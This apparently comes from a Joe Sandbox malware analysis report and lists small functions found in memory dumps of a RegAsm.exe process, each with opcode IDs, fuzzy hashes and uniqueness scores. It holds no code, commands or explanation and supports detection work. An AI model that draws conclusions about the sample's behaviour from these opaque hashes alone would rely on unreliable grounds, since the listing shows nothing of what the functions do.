                                                                                                                                                    • Instruction Fuzzy Hash: 2C01A1352143048FE324AB60D45A76A7BE3EBC5352F50C62AE04A97744DF79A80ACB92
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 05DABC70 Relevance: .0, Instructions: 46COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000D.00000002.1445300886.0000000005DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DA0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_13_2_5da0000_RegAsm.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: c232f84b81a78f87ce86c694baea7469541b366b0d51da88be509de7ffe09988
                                                                                                                                                    • Instruction ID: b41649266e3be701839b8e012729d96247a9f5201997435d65bdaa43ffb39715
                                                                                                                                                    • Opcode Fuzzy Hash: c232f84b81a78f87ce86c694baea7469541b366b0d51da88be509de7ffe09988
                                                                                                                                                    • Instruction Fuzzy Hash: 6E01D4392102058FE794B734E49A62E3BABEFC0252384882EE406CB710DD387D0B87D2
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 009DDA61 Relevance: .0, Instructions: 45COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000D.00000002.1432682347.00000000009DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 009DD000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_13_2_9dd000_RegAsm.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 3ce8052b9b5dfe5bd2e57c98d959fe52f7b8d880b8025d8ffb0e39e021145138
                                                                                                                                                    • Instruction ID: e0fecc7c190a7c87091472d0578decf809d49ca0be9d84008116bf1508b966aa
                                                                                                                                                    • Opcode Fuzzy Hash: 3ce8052b9b5dfe5bd2e57c98d959fe52f7b8d880b8025d8ffb0e39e021145138
                                                                                                                                                    • Instruction Fuzzy Hash: 6601F23158E3449FE7208A25CD84B27BB9CDF40325F18C96BEC084A382C6389C44CAB2
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 05DA5508 Relevance: .0, Instructions: 42COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000D.00000002.1445300886.0000000005DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DA0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_13_2_5da0000_RegAsm.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: ddbcf5ec49bb87a1a0d0012795797e915f387b8be6545b54cbe07a933b250722
                                                                                                                                                    • Instruction ID: 61e27e6a59a8eef8d65dc504c507608ff88fdcd1efe29caab21d39248c67b1bf
                                                                                                                                                    • Opcode Fuzzy Hash: ddbcf5ec49bb87a1a0d0012795797e915f387b8be6545b54cbe07a933b250722
                                                                                                                                                    • Instruction Fuzzy Hash: 7601AD32A01702CFCF288E25B804627B7F3BF84215708882AE04386A14DA75E482CB90
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 05DAC4A8 Relevance: .0, Instructions: 42COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000D.00000002.1445300886.0000000005DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DA0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_13_2_5da0000_RegAsm.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 14e044c01a1d61fee6fac56bc3b5b796139faa1f39f4ab0cb49f391a9696f1bf
                                                                                                                                                    • Instruction ID: c9064015d56448050a6c99006271de94b11fd749abf9586153d638e6a770314e
                                                                                                                                                    • Opcode Fuzzy Hash: 14e044c01a1d61fee6fac56bc3b5b796139faa1f39f4ab0cb49f391a9696f1bf
                                                                                                                                                    • Instruction Fuzzy Hash: 750192346043048FE324AF64D05965A7BE3EBC5352B10CA2DE44B87744CF79A90ACB92
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 05DAE8B0 Relevance: .0, Instructions: 41COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000D.00000002.1445300886.0000000005DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DA0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_13_2_5da0000_RegAsm.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 4b3ff5b359738449c39251a478e9738bddd260119c524ab9149a7ab44e553501
                                                                                                                                                    • Instruction ID: c64dbe8aabbc9cb85123f8b4b6bc9759b2e046c9a17bfae057195d9813a0b868
                                                                                                                                                    • Opcode Fuzzy Hash: 4b3ff5b359738449c39251a478e9738bddd260119c524ab9149a7ab44e553501
                                                                                                                                                    • Instruction Fuzzy Hash: 7201F4356183099FDB05DF74D85596A3FBAEF86200B4484FAE505CB322EA36DC06D791
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 05DA8F50 Relevance: .0, Instructions: 37COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000D.00000002.1445300886.0000000005DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DA0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_13_2_5da0000_RegAsm.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: fbe93b9b05c5ca2650924a546b4fbc4530823ad27b60f99e3d37596cc2be3c2f
                                                                                                                                                    • Instruction ID: 427efaa37bc4701e37a7ff9e4fd3f87bbd4f127c4d4d2226b0ca725962128532
                                                                                                                                                    • Opcode Fuzzy Hash: fbe93b9b05c5ca2650924a546b4fbc4530823ad27b60f99e3d37596cc2be3c2f
                                                                                                                                                    • Instruction Fuzzy Hash: E501C0B4D0820AEFCB04DFA9D9446AEFBF6BB49301F1084AA9915B3351E7744A40DF90
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 009DDA60 Relevance: .0, Instructions: 36COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000D.00000002.1432682347.00000000009DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 009DD000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_13_2_9dd000_RegAsm.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 6d0d64c8fd1acff90b8ff9c32e094dff61e4203e2f1984603ec716e098bc52ef
                                                                                                                                                    • Instruction ID: 2d44f1787807c980b52acfd9753e50213f794ccf23a1af3ad5e5efad23a77baa
                                                                                                                                                    • Opcode Fuzzy Hash: 6d0d64c8fd1acff90b8ff9c32e094dff61e4203e2f1984603ec716e098bc52ef
                                                                                                                                                    • Instruction Fuzzy Hash: E6F0CD31449344AFE7208A16CD84B62FF9CEB80735F18C55AED084A282C278AC44CBB1
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 05DA67C8 Relevance: .0, Instructions: 36COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000D.00000002.1445300886.0000000005DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DA0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_13_2_5da0000_RegAsm.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: cb7c69c4376b02ff6fe72229d00c79c26c60e7d6a9509d9a0ea91e943799c305
                                                                                                                                                    • Instruction ID: 45a730aeba746fc28ff6a7f9fc809efa7b73b94a4f530b6c7e24424175d61d98
                                                                                                                                                    • Opcode Fuzzy Hash: cb7c69c4376b02ff6fe72229d00c79c26c60e7d6a9509d9a0ea91e943799c305
                                                                                                                                                    • Instruction Fuzzy Hash: 5BF09632B04300DBD7218A78DC45F667FE9EB45711F188567F254CF5E1D6A1E809D741
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 05DA6EA0 Relevance: .0, Instructions: 35COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000D.00000002.1445300886.0000000005DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DA0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_13_2_5da0000_RegAsm.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 596561b26bd0f8941799f0f85273794ae0d2015d5e10ac3c36f026bc841d3ee7
                                                                                                                                                    • Instruction ID: f09896d3c0b204bfa5c427e61a84036631440fd2473e0876a69da61fcf81186c
                                                                                                                                                    • Opcode Fuzzy Hash: 596561b26bd0f8941799f0f85273794ae0d2015d5e10ac3c36f026bc841d3ee7
                                                                                                                                                    • Instruction Fuzzy Hash: FCF0AE722041D83F8F115E9A5C10CFB7FEDDACD1617044056FED4C1142C429CD11A7B0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 05DAC170 Relevance: .0, Instructions: 34COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000D.00000002.1445300886.0000000005DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DA0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_13_2_5da0000_RegAsm.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: a948efad08f8ab307fb0fcd7904327312c9575b02bc879433c20f30e29a7769b
                                                                                                                                                    • Instruction ID: 424dec7ed9f845eb167daa8bec6d13acaed0c5f9db861871f2d8e378a69f2bb7
                                                                                                                                                    • Opcode Fuzzy Hash: a948efad08f8ab307fb0fcd7904327312c9575b02bc879433c20f30e29a7769b
                                                                                                                                                    • Instruction Fuzzy Hash: AEF0AF35515B048FE715EF26E44A622BBF6FB88311B10C62AE48B82B10DF34A44ACF84
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 05DA8341 Relevance: .0, Instructions: 33COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000D.00000002.1445300886.0000000005DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DA0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_13_2_5da0000_RegAsm.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: c9d5a72d856f6bef8e43c0fa67d9b54bc3a1bb2078de68d9bf2956c6c978f367
                                                                                                                                                    • Instruction ID: d8e91ab1577687534483562221bbe26090f61ee91dee094692fa58fbb05e60b2
                                                                                                                                                    • Opcode Fuzzy Hash: c9d5a72d856f6bef8e43c0fa67d9b54bc3a1bb2078de68d9bf2956c6c978f367
                                                                                                                                                    • Instruction Fuzzy Hash: F0F0A772B141155B8F189AA9AC856BF7FBAFB892A1B080437EE55D3240FB308815D7D1
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 05DAADE9 Relevance: .0, Instructions: 33COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000D.00000002.1445300886.0000000005DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DA0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_13_2_5da0000_RegAsm.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 03375bd71e9e77e45acc26d018d995399dacbd4792d65cb60865a3f7b99df5cd
                                                                                                                                                    • Instruction ID: d10178dda9a8629c6d0083244e0a693bca19dafbf898af63a8aef85d22a8ebf3
                                                                                                                                                    • Opcode Fuzzy Hash: 03375bd71e9e77e45acc26d018d995399dacbd4792d65cb60865a3f7b99df5cd
                                                                                                                                                    • Instruction Fuzzy Hash: 9FF0E5322101106FD3143A66E88BBBE7FEADBC9761F40803EF14EC3342DE66580947A2
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 05DAACB8 Relevance: .0, Instructions: 33COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000D.00000002.1445300886.0000000005DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DA0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_13_2_5da0000_RegAsm.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 3eabf64718419f2e180bf00b61d7a8e3a21988990f40d37563c661a637d6d399
                                                                                                                                                    • Instruction ID: 90ae17c59e80d15ea80490af52a1919fd9c0e6bcc3be29998fdc912955395a64
                                                                                                                                                    • Opcode Fuzzy Hash: 3eabf64718419f2e180bf00b61d7a8e3a21988990f40d37563c661a637d6d399
                                                                                                                                                    • Instruction Fuzzy Hash: 6EF09E727082904FC31317755C150BD3F61DAC663634442DBE0CACB2D2CF084607C3A2
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 05DA8FC0 Relevance: .0, Instructions: 33COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000D.00000002.1445300886.0000000005DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DA0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_13_2_5da0000_RegAsm.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 59466e9e518a5e576ea0abc29554cab5e1148457ef753c8554d0aff80ca44ee0
                                                                                                                                                    • Instruction ID: 12219bfefaf13792ec1c8237a45e9b28d524e45ffc5fdd69c0c212a69dd4635f
                                                                                                                                                    • Opcode Fuzzy Hash: 59466e9e518a5e576ea0abc29554cab5e1148457ef753c8554d0aff80ca44ee0
                                                                                                                                                    • Instruction Fuzzy Hash: 49F062B6C0815ADFCB01DFA4C8555BEBFB1EB5A201F0045D7E846EB352D7398A41DB00
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 05DA54F8 Relevance: .0, Instructions: 31COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000D.00000002.1445300886.0000000005DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DA0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_13_2_5da0000_RegAsm.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: dca9888305badbdce18e3c6fd58f1ebc7df7cdfad57dc1aaf3d02cc94e2fa7a0
                                                                                                                                                    • Instruction ID: 24e35fcb86362325bc6661a14237c688c261774e3b3ec55676dd63b7ce4b1f2e
                                                                                                                                                    • Opcode Fuzzy Hash: dca9888305badbdce18e3c6fd58f1ebc7df7cdfad57dc1aaf3d02cc94e2fa7a0
                                                                                                                                                    • Instruction Fuzzy Hash: BBF0B4766047418FDF25CE31E900B7B7BF3BF80315F18886EE08246926D675E445CB40
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 05DAADF8 Relevance: .0, Instructions: 28COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000D.00000002.1445300886.0000000005DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DA0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_13_2_5da0000_RegAsm.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 4fe0696588a101a9e378b886cabe065eabfeeeac4f2bb3edbbf60bdca0546c1c
                                                                                                                                                    • Instruction ID: 778a6b65a4f37d6de090baa16a11c7fca36389c01113c277903d73b555a738f4
                                                                                                                                                    • Opcode Fuzzy Hash: 4fe0696588a101a9e378b886cabe065eabfeeeac4f2bb3edbbf60bdca0546c1c
                                                                                                                                                    • Instruction Fuzzy Hash: DAE09B312101006FD3106A66E44A66E7FDADBC9365B40803EF14EC3341CD65180547A2
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 05DAAC60 Relevance: .0, Instructions: 28COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000D.00000002.1445300886.0000000005DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DA0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_13_2_5da0000_RegAsm.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: d488b6121229f953a666f47d3ba3fd5d2afda000b6ed321e2f84512e1c076bb6
                                                                                                                                                    • Instruction ID: 3d52c6d775be3aaf41eb24458f06b3f6c346304f8da9baaf4b9db8ea6fb0d11c
                                                                                                                                                    • Opcode Fuzzy Hash: d488b6121229f953a666f47d3ba3fd5d2afda000b6ed321e2f84512e1c076bb6
                                                                                                                                                    • Instruction Fuzzy Hash: 92F082756583914FC313573568241BD3F21DB8653630401EBE099CB1D3CD180A06879A
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 05DA5698 Relevance: .0, Instructions: 27COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000D.00000002.1445300886.0000000005DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DA0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_13_2_5da0000_RegAsm.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 1d8d16344228d71fdfe9bb3bc8d358b8b5cc0064b89813248f97e7bfbc0f24d0
                                                                                                                                                    • Instruction ID: a31a6532902fbd990d4e90528f7b7e9394ee5cacd26c945016275861547048fa
                                                                                                                                                    • Opcode Fuzzy Hash: 1d8d16344228d71fdfe9bb3bc8d358b8b5cc0064b89813248f97e7bfbc0f24d0
                                                                                                                                                    • Instruction Fuzzy Hash: D6E06DB310C2119FD701DA60F84489B7BE8EB91220B198C6EE445C7241E631D942C766
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 05DAC180 Relevance: .0, Instructions: 27COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000D.00000002.1445300886.0000000005DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DA0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_13_2_5da0000_RegAsm.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 725f41d68f430951a21533ef158d5ec410536499d6d09fe05b9dc126b69a1c74
                                                                                                                                                    • Instruction ID: 58a8da9063b74a5f5e3e22a29a989b2f205a2a989f500aae63b3f676f8ad2d2c
                                                                                                                                                    • Opcode Fuzzy Hash: 725f41d68f430951a21533ef158d5ec410536499d6d09fe05b9dc126b69a1c74
                                                                                                                                                    • Instruction Fuzzy Hash: A8F09038504B058FE715EF26E449512BFF6FB88311700C62EE48B82A10DF74A44ACF84
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 05DAC120 Relevance: .0, Instructions: 25COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000D.00000002.1445300886.0000000005DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DA0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_13_2_5da0000_RegAsm.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: ca394b233eebe6c31a439c2e5ef74d70c66e1b8c6ce0dbe244ba5475820bd97c
                                                                                                                                                    • Instruction ID: 1798b987fd020e89ced7ce7489351dc3c9aead4bc6393ab896ff12dee7c2dc13
                                                                                                                                                    • Opcode Fuzzy Hash: ca394b233eebe6c31a439c2e5ef74d70c66e1b8c6ce0dbe244ba5475820bd97c
                                                                                                                                                    • Instruction Fuzzy Hash: B0E0A0342047548FD320A729E409BAF7FE69B81215F040529E1468B701DFA568058792
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 05DAE280 Relevance: .0, Instructions: 24COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000D.00000002.1445300886.0000000005DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DA0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_13_2_5da0000_RegAsm.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 60cac553b0b4c91ddfd8d0e322fa476b65da8cb14e9f59786c333743649a9ee7
                                                                                                                                                    • Instruction ID: aa7bca569430099a9d7a98d30b391740d73ad7b710162ec54592c1075dc0fb16
                                                                                                                                                    • Opcode Fuzzy Hash: 60cac553b0b4c91ddfd8d0e322fa476b65da8cb14e9f59786c333743649a9ee7
                                                                                                                                                    • Instruction Fuzzy Hash: DBE0DF779042004FCB1AB220ED929583BB2E7466003875187D841AF2B5DA186E0E8BD2
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 05DAB500 Relevance: .0, Instructions: 22COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000D.00000002.1445300886.0000000005DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DA0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_13_2_5da0000_RegAsm.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: f25e590968857f4af611c2c10df242a24b22d09c6663e649efd51479f1ae1619
                                                                                                                                                    • Instruction ID: c91fa52dd1432f5ca59934f5f59b3f5c35ae9b94d801829563b6fb92522e300d
                                                                                                                                                    • Opcode Fuzzy Hash: f25e590968857f4af611c2c10df242a24b22d09c6663e649efd51479f1ae1619
                                                                                                                                                    • Instruction Fuzzy Hash: 60E06D35C5454EABCB01CFF4D9058CDBF75EB01344B1483E6E82596291EA351B06DF80
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 05DACC38 Relevance: .0, Instructions: 22COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000D.00000002.1445300886.0000000005DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DA0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_13_2_5da0000_RegAsm.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 3655b41d20007cb11663a78d4f7b596881e8bcc590050605ecce8d61fffe312d
                                                                                                                                                    • Instruction ID: 90b3af28a2b6806ff58355d824ad8fb9dbc37838a5e996e3f3a8a6fd3394989a
                                                                                                                                                    • Opcode Fuzzy Hash: 3655b41d20007cb11663a78d4f7b596881e8bcc590050605ecce8d61fffe312d
                                                                                                                                                    • Instruction Fuzzy Hash: 2EE08C32A101108FE701FA24F842BAA77A1E785A21F50D531E000ABF89CA38580E8B81
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 05DAE1FF Relevance: .0, Instructions: 20COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000D.00000002.1445300886.0000000005DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DA0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_13_2_5da0000_RegAsm.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 0079b17d70efcf46742fee1715e0ebcb99b881507835748930219f44a000ff76
                                                                                                                                                    • Instruction ID: 03dc92c30ed51d4b38d40af41aa580fcd0ede035cc312c8cff0ed17e8e679b64
                                                                                                                                                    • Opcode Fuzzy Hash: 0079b17d70efcf46742fee1715e0ebcb99b881507835748930219f44a000ff76
                                                                                                                                                    • Instruction Fuzzy Hash: 60E086B1E44108EFDB10DF64E85175D77B1EB81212F308699E408D7390E6355F159742
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 05DAAC80 Relevance: .0, Instructions: 20COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000D.00000002.1445300886.0000000005DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DA0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_13_2_5da0000_RegAsm.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 7a8ba9cfff42fcde8ae217fd0581772a1505b871aa9f2956707b5fd2d7f900dc
                                                                                                                                                    • Instruction ID: c5f83944328601461fc47aa23171166772236d796a5119663581c725be059867
                                                                                                                                                    • Opcode Fuzzy Hash: 7a8ba9cfff42fcde8ae217fd0581772a1505b871aa9f2956707b5fd2d7f900dc
                                                                                                                                                    • Instruction Fuzzy Hash: 4FD02E31720228978A05332AF80A4BE3FABEBC4A36340403BF54EC3301CE282D0283D6
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

